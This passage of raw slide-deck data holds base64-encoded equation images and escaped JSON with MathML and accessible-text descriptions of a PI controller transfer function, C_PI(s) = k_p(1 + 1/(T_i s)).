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\&quot;,\&quot;slideId\&quot;:293,\&quot;accessibleText\&quot;:\&quot;C subscript P I end subscript open parentheses s close parentheses space equals thin space k subscript p open parentheses 1 space plus space fraction numerator 1 over denominator T subscript i s end fraction close parentheses space equals space k subscript p open parentheses fraction numerator T subscript i s space plus space 1 over denominator T subscript i s end fraction close parentheses\&quot;,\&quot;imageHeight\&quot;:34.61892583120205},{\&quot;mathml\&quot;:\&quot;&lt;math style=\\\&quot;font-family:stix;font-size:16px;\\\&quot; xmlns=\\\&quot;http://www.w3.org/1998/Math/MathML\\\&quot;&gt;&lt;mstyle mathsize=\\\&quot;16px\\\&quot;&gt;&lt;msub&gt;&lt;mi&gt;T&lt;/mi&gt;&lt;mrow&gt;&lt;mi&gt;i&lt;/mi&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;/mrow&gt;&lt;/msub&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo&gt;&amp;#x2009;&lt;/mo&gt;&lt;mi&gt;&amp;#x3C4;&lt;/mi&gt;&lt;mo&gt;,&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;C&lt;/mi&gt;&lt;mrow&gt;&lt;mi&gt;P&lt;/mi&gt;&lt;mi&gt;I&lt;/mi&gt;&lt;/mrow&gt;&lt;/msub&gt;&lt;mfenced&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;/mfenced&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo&gt;&amp;#x2009;&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;k&lt;/mi&gt;&lt;mi&gt;p&lt;/mi&gt;&lt;/msub&gt;&lt;mfenced&gt;&lt;mfrac&gt;&lt;mrow&gt;&lt;mi&gt;&amp;#x3C4;&lt;/mi&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;+&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/mrow&gt;&lt;mrow&gt;&lt;mi&gt;&amp;#x3C4;&lt;/mi&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;/mrow&gt;&lt;/mfrac&gt;&lt;/mfenced&gt;&lt;/mstyle&gt;&lt;/math&gt;\&quot;,\&quot;base64Image\&quot;:\&qu